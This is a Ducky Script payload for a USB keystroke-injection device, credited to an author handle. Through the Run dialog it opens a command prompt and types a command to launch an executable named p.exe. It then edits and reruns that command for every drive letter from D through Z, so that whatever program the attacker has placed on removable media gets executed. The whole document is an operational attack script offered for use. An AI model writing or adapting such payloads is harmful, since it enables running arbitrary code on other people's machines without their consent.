REM made by !DED#0026
REM put the exe that you wanna execute on a drive drive of your choice and name it p.exe or change the name in line 9(don't recommend because one letter is faster to type)
REM despite this being a huge script, trust me it runs fast.
GUI R
DELAY 100
STRING cmd /T:02
ENTER
DELAY 100
STRING CALL D:\p.exe
CTRL A
CTRL C
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
E
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
F
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
G
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
H
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
I
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
J
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
K
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
L
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
M
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
N
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
O
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
P
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
Q
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
R
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
S
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
T
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
U
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
V
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
W
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
X
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
Y
ENTER
CTRL V
LEFT
REPEAT 6
BACKSPACE
Z
ENTER
ALT SPACE
C